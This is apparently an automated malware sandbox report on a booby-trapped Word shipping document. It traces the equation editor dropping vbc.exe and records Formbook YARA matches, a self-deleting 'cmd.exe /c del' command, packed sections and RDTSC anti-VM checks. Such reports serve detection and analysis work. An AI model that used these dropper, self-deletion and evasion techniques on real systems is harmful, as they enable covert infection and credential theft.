Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020E0F3F	14_2_020E0F3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020FDF7C	14_2_020FDF7C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02100D3B	14_2_02100D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020DCD5B	14_2_020DCD5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0216FDDD	14_2_0216FDDD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000EC4CF	14_2_000EC4CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000EB502	14_2_000EB502
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000ECABA	14_2_000ECABA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000D8C5B	14_2_000D8C5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000D8C60	14_2_000D8C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000EBD2F	14_2_000EBD2F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000D2D87	14_2_000D2D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000D2D90	14_2_000D2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000D2FB0	14_2_000D2FB0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe 98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 020CDF5C appears 118 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 020CE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0213F970 appears 81 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0211373B appears 238 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02113F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007AF970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0078373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0073E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041A0A0 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00783F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0073DF5C appears 118 times

Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 0000000D.00000000.2118173395.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@9/22@1/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$L Shipping doc & Shipment tracking details.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5AF.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: netstat.pdb source: vbc.exe, 0000000B.00000002.2145782499.00000000003E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 11.2.vbc.exe.400000.2.unpack .text:ER;.data:W;.fipuh:W;.wuta:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;

Source: vbc[1].exe.7.dr	Static PE information: section name: .fipuh
Source: vbc[1].exe.7.dr	Static PE information: section name: .wuta
Source: vbc[1].exe.7.dr	Static PE information: section name: .new
Source: vbc.exe.7.dr	Static PE information: section name: .fipuh
Source: vbc.exe.7.dr	Static PE information: section name: .wuta
Source: vbc.exe.7.dr	Static PE information: section name: .new

Source: C:\Users\Public\vbc.exe	Code function: 9_2_002370D6 pushfd ; iretd	9_2_002370D9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023D921 pushfd ; ret	9_2_0023D928
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023C955 push eax; ret	9_2_0023C9A8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023C9A2 push eax; ret	9_2_0023C9A8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023C9AB push eax; ret	9_2_0023CA12
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023CA0C push eax; ret	9_2_0023CA12
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0022D32A push 00000064h; retf	9_2_0022D32C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023743D push esi; iretd	9_2_00237446
Source: C:\Users\Public\vbc.exe	Code function: 9_2_002364CB push 0000000Dh; retf	9_2_002364CE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00237516 pushfd ; iretd	9_2_0023752F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03F2E2D7 push ebx; iretd	9_2_03F2E4A7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03F2E4AD push ebx; iretd	9_2_03F2E4A7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03F2E46F push ebx; iretd	9_2_03F2E4A7
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00415B36 pushfd ; iretd	11_2_00415B39
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041C381 pushfd ; ret	11_2_0041C388
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041B3B5 push eax; ret	11_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041B46C push eax; ret	11_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041B402 push eax; ret	11_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041B40B push eax; ret	11_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0040BD8A push 00000064h; retf	11_2_0040BD8C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00415E9D push esi; iretd	11_2_00415EA6
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00415F76 pushfd ; iretd	11_2_00415F8F
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00414F2B push 0000000Dh; retf	11_2_00414F2E
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073DFA1 push ecx; ret	11_2_0073DFB4
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00415B36 pushfd ; iretd	11_1_00415B39
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041C381 pushfd ; ret	11_1_0041C388
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041B3B5 push eax; ret	11_1_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041B46C push eax; ret	11_1_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041B402 push eax; ret	11_1_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041B40B push eax; ret	11_1_0041B472
Source: C:\Windows\explorer.exe	Code function: 13_2_02941030 push eax; iretd	13_2_02941031

Source: initial sample	Static PE information: section name: .text entropy: 7.49490680745
Source: initial sample	Static PE information: section name: .text entropy: 7.49490680745

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000D85E4 second address: 00000000000D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000D897E second address: 00000000000D8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 9_2_00229B80 rdtsc

9_2_00229B80

